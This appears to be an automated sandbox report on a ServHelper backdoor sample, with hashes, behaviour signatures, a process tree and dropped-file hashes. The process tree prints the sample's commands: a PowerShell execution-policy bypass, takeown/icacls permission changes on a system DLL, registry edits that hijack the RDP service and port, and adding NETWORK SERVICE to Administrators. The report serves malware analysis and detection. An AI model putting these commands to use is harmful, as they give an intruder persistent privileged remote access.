Analysis
-
max time kernel
142s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
30-03-2024 02:34
General
-
Target
3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
3170bcf7de646f8612910ab98f6d1861
-
SHA1
71d81b3dd1747cf1c0e744fcb1809d6522eab902
-
SHA256
bea9da3ee504f62fc074963332e96297c7fff5efb2999efc946bc518a3765c00
-
SHA512
f232d67902f1b7fc3eb73efc7df575dcac83f5943e613e61982c78c9d4c47b18eadd6d87f2b4d040ec4125f4770a33f03b5743b3b18c34ab622b258f913b91c5
-
SSDEEP
98304:OcaOt2a4P7cEg9j1rQT6YHyV4QWfjmRbM4rmqof6+oO+e:x4a4ndrE4QWfjm1M4rm1fqFe
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dmhhxp5a\dmhhxp5a.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES412F.tmp" "c:\Users\Admin\AppData\Local\Temp\dmhhxp5a\CSCDF28400DD5484A11B74C528EA7680A0.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cc389dfcb3452ca013da39252f2450eb
SHA13ee4da0afcb0b4e6fe9343c40fa4fb67fb53b176
SHA256a38536552f2a0774e3429b3b0f5d901910c3a7075c6c752c90afc2d72e2fcc08
SHA512054356fdc744ad358ef1493b589ef8056af0a7427389451553f22b39ec1ec2fad53ae33811e8f369c2b97448c625997336a4fcd078dfad56ba9e9dae8d1ab7ea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD585d74c10b31524cc88898f5502a1c8cc
SHA1460a17436b817a76bce1dad84980b82feceb9b5d
SHA2567094b8cb5decaf6efbb5dc6871c40f557652c2c43583111b89537bd4fadaa41a
SHA512a4074c0107f750bc616f2b5cc53daed17d29d3cebc48e64191c42451b5094ca52579ad2dd31acba0d619124c95a309a030785812976ab7284c84d46982768184
-
Filesize
2.5MB
MD5794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5188b9913939231812a2fc07cd7571bfa
SHA10cbd3092f542d709d055375a37c0a2dc23dd421e
SHA256d7b5f2105d5340805d8b1bd10762286351348622778139263df5c8900086edf1
SHA512aeb59d1bb30b76ec233f3faed749765db897f63c30a8133dcfbb91ac354d9c0291520eec4c69e857f70f17a48c2a67299371f71df557c0164156509fcd514c83
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD5730189806b58f09583665ebc67e124a2
SHA139d0a1da7f0ed90e27f3978581ff7bf7706c8a9f
SHA2560b63ebba6aaeb9e8e4462dc6f382b71648697bbfbca88da54fea3dff281e5e0e
SHA512880213100dd1abdde570b6f57b7c7320ee8a1ca9e30fb9999394fa85f5caf8f0b207ece87d2d91dd3312e2f8fc2667dca508541ef8eb874498577363c3106dd5
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
652KB
-
Filesize
64KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
200KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
176KB
-
Filesize
32KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
4.1MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
4.1MB
-
Filesize
7.7MB
-
Filesize
584KB
-
Filesize
5.6MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4.0MB
-
Filesize
22.8MB
-
Filesize
4.0MB
-
Filesize
4.0MB